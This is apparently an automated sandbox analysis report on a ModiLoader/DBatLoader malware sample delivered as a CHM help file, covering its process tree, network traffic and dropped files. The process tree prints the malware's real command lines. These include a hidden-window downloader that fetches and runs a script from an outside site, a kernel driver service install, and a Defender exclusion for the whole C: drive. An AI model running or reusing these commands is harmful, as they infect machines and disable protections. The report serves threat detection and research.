Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/01/2025, 03:32 UTC

General

  • Target

    a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm

  • Size

    75KB

  • MD5

    92588daadcf11b3311b82e8b20219340

  • SHA1

    68c690da91c4a1cb0e7336b055ea87877a7b8b9d

  • SHA256

    a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101

  • SHA512

    38fa50cfad7f030712b9c8a81af995b0319075aa5e9ba3768d799bf13aa0532130d491bb6d90d0c8fbc2e8ffacc31e85629152d3281d4818eb8716d0f16cd523

  • SSDEEP

    1536:PRReoi9mRqozQM8I3FInJQqcN8HSsIN2i5reqgdMb0OYqFHPf:5Rez9kTAoFI7jq2i6qgGbzYOn

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modiloader family
  • ModiLoader Second Stage 61 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1876
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
      2⤵
      • Hide Artifacts: Hidden Window
      • Suspicious use of WriteProcessMemory
      PID:4000
      • C:\Windows\system32\extrac32.exe
        extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
        3⤵
          PID:5024
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2192
          • C:\Users\Public\ript.exe
            "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd
            4⤵
            • Executes dropped EXE
            PID:3736
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4832
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\df.cmd" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5008
            • C:\Windows\system32\extrac32.exe
              extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
              5⤵
                PID:2984
              • C:\Users\Admin\AppData\Local\Temp\x.exe
                "C:\Users\Admin\AppData\Local\Temp\x.exe"
                5⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4508
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\HnqtinbxF.cmd" "
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:3912
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:640
                  • C:\Windows \SysWOW64\svchost.pif
                    "C:\Windows \SysWOW64\svchost.pif"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:3812
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
                      8⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1128
                      • C:\Windows\system32\extrac32.exe
                        extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif
                        9⤵
                          PID:1012
                        • C:\Windows\system32\extrac32.exe
                          extrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif
                          9⤵
                            PID:4256
                          • C:\Windows\system32\extrac32.exe
                            extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif
                            9⤵
                              PID:4912
                            • C:\Users\Public\alpha.pif
                              C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4488
                              • C:\Users\Public\Upha.pif
                                C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
                                10⤵
                                • Executes dropped EXE
                                PID:1540
                            • C:\Users\Public\alpha.pif
                              C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2252
                              • C:\Users\Public\Upha.pif
                                C:\\Users\\Public\\Upha.pif start TrueSight
                                10⤵
                                • Executes dropped EXE
                                PID:2020
                            • C:\Users\Public\alpha.pif
                              C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4784
                              • C:\Users\Public\aken.pif
                                C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                10⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2908
                      • C:\Users\Public\Libraries\xbnitqnH.pif
                        C:\Users\Public\Libraries\xbnitqnH.pif
                        6⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:3440
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM hh.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:996

            Network

            • flag-us
              DNS
              133.211.185.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              133.211.185.52.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              8.153.16.2.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              8.153.16.2.in-addr.arpa
              IN PTR
              Response
              8.153.16.2.in-addr.arpa
              IN PTR
              a2-16-153-8deploystaticakamaitechnologiescom
            • flag-us
              DNS
              projectvends.org
              ript.exe
              Remote address:
              8.8.8.8:53
              Request
              projectvends.org
              IN A
              Response
              projectvends.org
              IN A
              198.252.111.65
            • flag-us
              GET
              https://projectvends.org/WPS/PT.cmd
              ript.exe
              Remote address:
              198.252.111.65:443
              Request
              GET /WPS/PT.cmd HTTP/1.1
              Accept: */*
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: projectvends.org
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Connection: Keep-Alive
              Keep-Alive: timeout=5, max=100
              content-type: application/octet-stream
              last-modified: Mon, 20 Jan 2025 01:45:22 GMT
              accept-ranges: bytes
              content-length: 1012099
              date: Tue, 21 Jan 2025 03:32:44 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            • flag-us
              DNS
              73.31.126.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              73.31.126.40.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              168.245.100.95.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              168.245.100.95.in-addr.arpa
              IN PTR
              Response
              168.245.100.95.in-addr.arpa
              IN PTR
              a95-100-245-168deploystaticakamaitechnologiescom
            • flag-us
              DNS
              65.111.252.198.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              65.111.252.198.in-addr.arpa
              IN PTR
              Response
              65.111.252.198.in-addr.arpa
              IN PTR
              65111252198staticreverse arandomservercom
            • flag-us
              DNS
              167.173.78.104.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              167.173.78.104.in-addr.arpa
              IN PTR
              Response
              167.173.78.104.in-addr.arpa
              IN PTR
              a104-78-173-167deploystaticakamaitechnologiescom
            • flag-us
              DNS
              209.205.72.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              209.205.72.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              58.55.71.13.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              58.55.71.13.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              drive.google.com
              x.exe
              Remote address:
              8.8.8.8:53
              Request
              drive.google.com
              IN A
              Response
              drive.google.com
              IN A
              172.217.169.78
            • flag-us
              DNS
              78.169.217.172.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              78.169.217.172.in-addr.arpa
              IN PTR
              Response
              78.169.217.172.in-addr.arpa
              IN PTR
              lhr48s09-in-f141e100net
            • flag-gb
              GET
              https://drive.google.com/uc?export=download&id=1fWSMCj7vFRuJOlmhWRz1EIKq_Iw0ppYR
              x.exe
              Remote address:
              172.217.169.78:443
              Request
              GET /uc?export=download&id=1fWSMCj7vFRuJOlmhWRz1EIKq_Iw0ppYR HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: drive.google.com
              Response
              HTTP/1.1 303 See Other
              Content-Type: application/binary
              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
              Pragma: no-cache
              Expires: Mon, 01 Jan 1990 00:00:00 GMT
              Date: Tue, 21 Jan 2025 03:33:03 GMT
              Location: https://drive.usercontent.google.com/download?id=1fWSMCj7vFRuJOlmhWRz1EIKq_Iw0ppYR&export=download
              Strict-Transport-Security: max-age=31536000
              Cross-Origin-Opener-Policy: same-origin
              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
              Content-Security-Policy: script-src 'report-sample' 'nonce-c4HMUwpKjK3DIPcW9rl2mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
              Server: ESF
              Content-Length: 0
              X-XSS-Protection: 0
              X-Frame-Options: SAMEORIGIN
              X-Content-Type-Options: nosniff
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            • flag-us
              DNS
              drive.usercontent.google.com
              x.exe
              Remote address:
              8.8.8.8:53
              Request
              drive.usercontent.google.com
              IN A
              Response
              drive.usercontent.google.com
              IN A
              216.58.212.193
            • flag-gb
              GET
              https://drive.usercontent.google.com/download?id=1fWSMCj7vFRuJOlmhWRz1EIKq_Iw0ppYR&export=download
              x.exe
              Remote address:
              216.58.212.193:443
              Request
              GET /download?id=1fWSMCj7vFRuJOlmhWRz1EIKq_Iw0ppYR&export=download HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: drive.usercontent.google.com
              Response
              HTTP/1.1 200 OK
              X-GUploader-UploadID: AFIdbgSn1s_30ght0wlz1GSELupeboCQOdygedqdnetYuss1xJLWvml6iPxwd4R2krP6JbTz
              Content-Type: application/octet-stream
              Content-Security-Policy: sandbox
              Content-Security-Policy: default-src 'none'
              Content-Security-Policy: frame-ancestors 'none'
              X-Content-Security-Policy: sandbox
              Cross-Origin-Opener-Policy: same-origin
              Cross-Origin-Embedder-Policy: require-corp
              Cross-Origin-Resource-Policy: same-site
              X-Content-Type-Options: nosniff
              Content-Disposition: attachment; filename="245_Hnqtinbxfuo"
              Access-Control-Allow-Origin: *
              Access-Control-Allow-Credentials: false
              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-Bot-Info, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
              Accept-Ranges: bytes
              Content-Length: 2299784
              Last-Modified: Mon, 20 Jan 2025 01:39:47 GMT
              Date: Tue, 21 Jan 2025 03:33:07 GMT
              Expires: Tue, 21 Jan 2025 03:33:07 GMT
              Cache-Control: private, max-age=0
              X-Goog-Hash: crc32c=5z2AaQ==
              Server: UploadServer
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            • flag-us
              DNS
              193.212.58.216.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              193.212.58.216.in-addr.arpa
              IN PTR
              Response
              193.212.58.216.in-addr.arpa
              IN PTR
              ams16s21-in-f1931e100net
              193.212.58.216.in-addr.arpa
              IN PTR
              ams16s21-in-f1�J
              193.212.58.216.in-addr.arpa
              IN PTR
              lhr25s27-in-f1�J
            • flag-us
              DNS
              196.249.167.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              196.249.167.52.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              149.220.183.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              149.220.183.52.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              212.20.149.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              212.20.149.52.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              18.31.95.13.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              18.31.95.13.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              166.190.18.2.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              166.190.18.2.in-addr.arpa
              IN PTR
              Response
              166.190.18.2.in-addr.arpa
              IN PTR
              a2-18-190-166deploystaticakamaitechnologiescom
            • flag-us
              DNS
              182.129.81.91.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              182.129.81.91.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              11.227.111.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              11.227.111.52.in-addr.arpa
              IN PTR
              Response
            • 198.252.111.65:443
              https://projectvends.org/WPS/PT.cmd
              tls, http
              ript.exe
              36.2kB
              1.0MB
              759
              755

              HTTP Request

              GET https://projectvends.org/WPS/PT.cmd

              HTTP Response

              200
            • 172.217.169.78:443
              drive.google.com
              x.exe
              190 B
              92 B
              4
              2
            • 172.217.169.78:443
              https://drive.google.com/uc?export=download&id=1fWSMCj7vFRuJOlmhWRz1EIKq_Iw0ppYR
              tls, http
              x.exe
              918 B
              9.9kB
              9
              11

              HTTP Request

              GET https://drive.google.com/uc?export=download&id=1fWSMCj7vFRuJOlmhWRz1EIKq_Iw0ppYR

              HTTP Response

              303
            • 216.58.212.193:443
              https://drive.usercontent.google.com/download?id=1fWSMCj7vFRuJOlmhWRz1EIKq_Iw0ppYR&export=download
              tls, http
              x.exe
              32.5kB
              2.2MB
              694
              1550

              HTTP Request

              GET https://drive.usercontent.google.com/download?id=1fWSMCj7vFRuJOlmhWRz1EIKq_Iw0ppYR&export=download

              HTTP Response

              200
            • 8.8.8.8:53
              133.211.185.52.in-addr.arpa
              dns
              73 B
              147 B
              1
              1

              DNS Request

              133.211.185.52.in-addr.arpa

            • 8.8.8.8:53
              8.153.16.2.in-addr.arpa
              dns
              69 B
              131 B
              1
              1

              DNS Request

              8.153.16.2.in-addr.arpa

            • 8.8.8.8:53
              projectvends.org
              dns
              ript.exe
              62 B
              78 B
              1
              1

              DNS Request

              projectvends.org

              DNS Response

              198.252.111.65

            • 8.8.8.8:53
              73.31.126.40.in-addr.arpa
              dns
              71 B
              157 B
              1
              1

              DNS Request

              73.31.126.40.in-addr.arpa

            • 8.8.8.8:53
              168.245.100.95.in-addr.arpa
              dns
              73 B
              139 B
              1
              1

              DNS Request

              168.245.100.95.in-addr.arpa

            • 8.8.8.8:53
              65.111.252.198.in-addr.arpa
              dns
              73 B
              134 B
              1
              1

              DNS Request

              65.111.252.198.in-addr.arpa

            • 8.8.8.8:53
              167.173.78.104.in-addr.arpa
              dns
              73 B
              139 B
              1
              1

              DNS Request

              167.173.78.104.in-addr.arpa

            • 8.8.8.8:53
              209.205.72.20.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              209.205.72.20.in-addr.arpa

            • 8.8.8.8:53
              58.55.71.13.in-addr.arpa
              dns
              70 B
              144 B
              1
              1

              DNS Request

              58.55.71.13.in-addr.arpa

            • 8.8.8.8:53
              drive.google.com
              dns
              x.exe
              62 B
              78 B
              1
              1

              DNS Request

              drive.google.com

              DNS Response

              172.217.169.78

            • 8.8.8.8:53
              78.169.217.172.in-addr.arpa
              dns
              73 B
              112 B
              1
              1

              DNS Request

              78.169.217.172.in-addr.arpa

            • 8.8.8.8:53
              drive.usercontent.google.com
              dns
              x.exe
              74 B
              90 B
              1
              1

              DNS Request

              drive.usercontent.google.com

              DNS Response

              216.58.212.193

            • 8.8.8.8:53
              193.212.58.216.in-addr.arpa
              dns
              73 B
              171 B
              1
              1

              DNS Request

              193.212.58.216.in-addr.arpa

            • 8.8.8.8:53
              196.249.167.52.in-addr.arpa
              dns
              73 B
              147 B
              1
              1

              DNS Request

              196.249.167.52.in-addr.arpa

            • 8.8.8.8:53
              149.220.183.52.in-addr.arpa
              dns
              73 B
              147 B
              1
              1

              DNS Request

              149.220.183.52.in-addr.arpa

            • 8.8.8.8:53
              212.20.149.52.in-addr.arpa
              dns
              72 B
              146 B
              1
              1

              DNS Request

              212.20.149.52.in-addr.arpa

            • 8.8.8.8:53
              18.31.95.13.in-addr.arpa
              dns
              70 B
              144 B
              1
              1

              DNS Request

              18.31.95.13.in-addr.arpa

            • 8.8.8.8:53
              166.190.18.2.in-addr.arpa
              dns
              71 B
              135 B
              1
              1

              DNS Request

              166.190.18.2.in-addr.arpa

            • 8.8.8.8:53
              182.129.81.91.in-addr.arpa
              dns
              72 B
              147 B
              1
              1

              DNS Request

              182.129.81.91.in-addr.arpa

            • 8.8.8.8:53
              11.227.111.52.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              11.227.111.52.in-addr.arpa

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              2KB

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              64B

              MD5

              446dd1cf97eaba21cf14d03aebc79f27

              SHA1

              36e4cc7367e0c7b40f4a8ace272941ea46373799

              SHA256

              a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

              SHA512

              a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              64B

              MD5

              5caad758326454b5788ec35315c4c304

              SHA1

              3aef8dba8042662a7fcf97e51047dc636b4d4724

              SHA256

              83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

              SHA512

              4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_saszecxm.gv2.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\x.exe

              Filesize

              988KB

              MD5

              1d72e2b8a6cb15d3669376eadc4d4b09

              SHA1

              953c07f56947255c2974049349a3ac019c74f472

              SHA256

              6943783baf38adb80a064fb099a753de317015f0b660e3b4f3b1c201cfbdf3ac

              SHA512

              a476a17e7eb315b25ace3101ed5ad05964d3cbb14a9a212e1f2de030d2dc945d7d2f14b0b9df4e85db601b100d78e9e50fa189df348ad4c1548d41bdd1d7c883

            • C:\Users\Public\HnqtinbxF.cmd

              Filesize

              11KB

              MD5

              f82aeb3b12f33250e404df6ec873dd1d

              SHA1

              bcf538f64457e8d19da89229479cafa9c4cce12f

              SHA256

              23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

              SHA512

              6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

            • C:\Users\Public\Libraries\FX.cmd

              Filesize

              8KB

              MD5

              7821e3de3812e791cf3b223500d73bc9

              SHA1

              5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

              SHA256

              3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

              SHA512

              6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

            • C:\Users\Public\Libraries\NEO.cmd

              Filesize

              55KB

              MD5

              3c755cf5a64b256c08f9bb552167975c

              SHA1

              8c81ca56b178ffd77b15f59c5332813416d976d7

              SHA256

              12e0795aa1408bea69bfd0a53bb74558598e71b33fc12ffec0e0ae38d39da490

              SHA512

